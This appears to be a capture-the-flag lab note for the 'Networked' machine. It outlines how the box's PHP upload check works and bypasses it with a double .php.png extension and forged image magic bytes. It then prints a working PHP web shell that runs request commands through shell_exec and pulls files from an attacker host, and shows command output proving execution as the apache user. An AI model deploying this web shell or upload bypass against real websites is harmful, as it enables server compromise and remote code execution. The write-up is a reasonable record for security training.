3 :80 upload.php & lib.php

# file: upload.php
upload dir: /var/www/html/uploads/

POST submit:
	check_file_type => Content-Type: image/*
	check_file_size => size < 60000
	return invalid image - break
	
	if valid image:
		name = IP(separated with '_').ext | 10_10_16_7.php.png 
		move uploaded file to uplaod_dir
		chmod 644 file

# file: lib.php
getnameUpload($filename) | k.php.png
	pieces = array(split on '.') | [k, php, png]
	name = pieces[0] | k
	name = replace '_' with '.' | k
	ext = join pieces with '.' after the removed 1st element |  php.png
	return name, ext

# tried the basic shell
<?php
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents('http://IP/' . $_REQUEST['fupload']));
    };
?>

# can see the file but cannot run commands
# trying the webshell
# added 16 X on top 
# hexeditor to change magic bytes
# upload successful > 
http://networked.htb/uploads/10_10_16_7.php.png

CMD: whoami;id;hostname;uname -a
apache
uid=48(apache) gid=48(apache) groups=48(apache)
networked.htb
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Last updated